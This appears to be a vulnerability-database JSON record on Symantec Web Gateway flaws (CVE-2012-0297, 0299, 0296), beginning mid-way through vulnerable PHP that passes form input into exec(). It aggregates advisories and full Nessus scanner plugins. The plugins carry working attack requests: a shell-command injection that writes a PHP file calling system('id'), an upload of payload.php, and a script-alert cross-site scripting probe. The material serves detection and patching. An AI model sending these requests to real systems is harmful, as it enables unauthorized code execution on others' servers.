.((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):''));\n \n exec(\"sudo /bin/rm -f /home/admin/autoconfig\". $savename);\n \t// save info to autoconfig file\n \texec(\"echo \\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename);\n //\techo \"\\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .(($_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .(($_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename;\n \tsleep(5);\t// we sleep because otherwise we get back before the changes take effect\n }\n \n ?>\n <script language=\"javascript\"> window.location=\"admin_advanced.php\";</script>\n \n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "attackerkb", "title": "CVE-2012-0297 Symantec Web Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2020-02-13T00:00:00", "id": "AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97", "href": "https://attackerkb.com/topics/cMKWCp2RlE/cve-2012-0297-symantec-web-gateway-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:0D475EE538584A09C093C3CE051B9477", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-12-03T16:52:20", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<https://vulners.com/cve/CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:28", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:CA79171627977B6EB496110895555ECA", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T18:52:50", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<https://vulners.com/cve/CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the \"relfile\" parameter. This can be exploited to execute arbitrary PHP code. \n\n### Resolution\n\nUpgrade Symantec Web Gateway to version 5.0.3 or higher. \n\n### References\n\n<http://secunia.com/advisories/49216> \n[http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 ](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\n>) \n\n\n### Limitations\n\nThis exploit has been tested against Symantec Web Gateway 5.0.0.216 and 5.0.2.8 \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "saint", "title": "Symantec Web Gateway access_log PHP Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "SAINT:09723FE34C900B59CB593CFB790946C5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/symantec_web_gateway_access_log_rce", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Local file include vulnerability in Symantec Web Gateway releasenotes.php\n\nVulnerability Type: Local File Include", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 LFI", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-163", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in Symantec Web Gateway blocked_file.php\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2013-04-02T00:00:00", "id": "E-82", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Symantec Web Gateway network.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-158", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-12-03T16:02:33", "description": "The remote web server is hosting a version of Symantec Web Gateway that is affected by a shell command injection vulnerability. The ipchange.php script calls the exec() function with user-controlled input that is not properly sanitized. A remote, unauthenticated attacker could exploit this to execute arbitrary shell commands as the apache user. After exploitation, obtaining a root shell is trivial.", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59208);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0297\");\n script_bugtraq_id(53444);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n\n script_name(english:\"Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)\");\n script_summary(english:\"Uploads and executes a PHP script\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nthat is affected by a shell command injection vulnerability. The\nipchange.php script calls the exec() function with user-controlled\ninput that is not properly sanitized. A remote, unauthenticated\nattacker could exploit this to execute arbitrary shell commands as\nthe apache user. After exploitation, obtaining a root shell is\ntrivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nurl = install['dir'] + '/ipchange.php';\nfilename = strcat('cleaner/', SCRIPT_NAME, '-', unixtime(), '.php');\ncmd = 'echo \"<? system(\"id\"); ?>\" > ' + filename;\npostdata = 'ip=localhost%0d%0a&subnet=\"|' + cmd + '|\"';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'application/x-www-form-urlencoded',\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/' + filename;\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(!egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus created a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:02:34", "description": "The remote web server is hosting a version of Symantec Web Gateway with a code execution vulnerability. The upload_file() function of util_functions.php allows PHP files to be uploaded to a directory where the web server can execute them. This function is used by multiple PHP scripts that can be requested without authentication. A remote, unauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59210", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59210);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0299\");\n script_bugtraq_id(53443);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n\n script_name(english:\"Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)\");\n script_summary(english:\"Tries to upload & request a PHP file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nwith a code execution vulnerability. The upload_file() function of\nutil_functions.php allows PHP files to be uploaded to a directory where\nthe web server can execute them. This function is used by multiple PHP\nscripts that can be requested without authentication. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nboundary = '----nessus';\nurl = install['dir'] + '/blocked_file.php';\nnow = unixtime();\nphp = '<?php print_r(\"' + now + '\\\\n\"); system(\"id\"); ?>';\npostdata = '--' + boundary + '\\r\nContent-Disposition: form-data; name=\"submitted\"\\r\n\\r\n1\\r\n--' + boundary + '\\r\nContent-Disposition: form-data; name=\"new_image\"; filename=\"payload.php\"\\r\nContent-Type: text/plain\\r\n\\r\n' + php + '\\r\n\\r\n--' + boundary + '--\\r\\n';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'multipart/form-data; boundary=' + boundary,\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/images/upload/temp/temp.php';\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(now >!< res[2] || !egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus uploaded a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:02:48", "description": "The remote web server is hosting a version of Symantec Web Gateway that is vulnerable to cross-site scripting attacks. Input to the 'l' parameter of timer.php is not properly sanitized. An attacker could exploit this by tricking a user into making a malicious request, resulting in arbitrary script code execution. There are reportedly other cross-site scripting vulnerabilities in this version of the software, though Nessus has not checked for those issues.", "cvss3": {}, "published": "2012-05-15T00:00:00", "type": "nessus", "title": "Symantec Web Gateway timer.php XSS (SYM12-006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/59097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59097);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0296\");\n script_bugtraq_id(53396);\n script_xref(name:\"EDB-ID\", value:\"18832\");\n\n script_name(english:\"Symantec Web Gateway timer.php XSS (SYM12-006)\");\n script_summary(english:\"Attempts reflected XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web security application hosted on the remote web server has a\ncross-site scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nthat is vulnerable to cross-site scripting attacks. Input to the 'l'\nparameter of timer.php is not properly sanitized. An attacker could\nexploit this by tricking a user into making a malicious request,\nresulting in arbitrary script code execution. There are reportedly\nother cross-site scripting vulnerabilities in this version of the\nsoftware, though Nessus has not checked for those issues.\"\n );\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Symantec Web Gateway 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\"); \n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\ncgi = '/timer.php';\nxss = '<script>alert(/' + SCRIPT_NAME + '/)</script>';\nqs = 'l=' + xss;\nexpected_output = '0 of ' + xss + ' bytes scanned';\n\nvulnerable = test_cgi_xss(\n port:port,\n dirs:make_list(dir),\n cgi:cgi,\n qs:qs,\n pass_str:expected_output,\n ctrl_re:'<h3>Symantec Web Gateway</h3>'\n);\n\nif (!vulnerable)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:dir, port:port));\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "d2": [{"lastseen": "2021-07-28T14:32:17", "description": "**Name**| d2sec_symwebgw \n---|--- \n**CVE**| CVE-2012-0297 \n**Exploit Pack**| 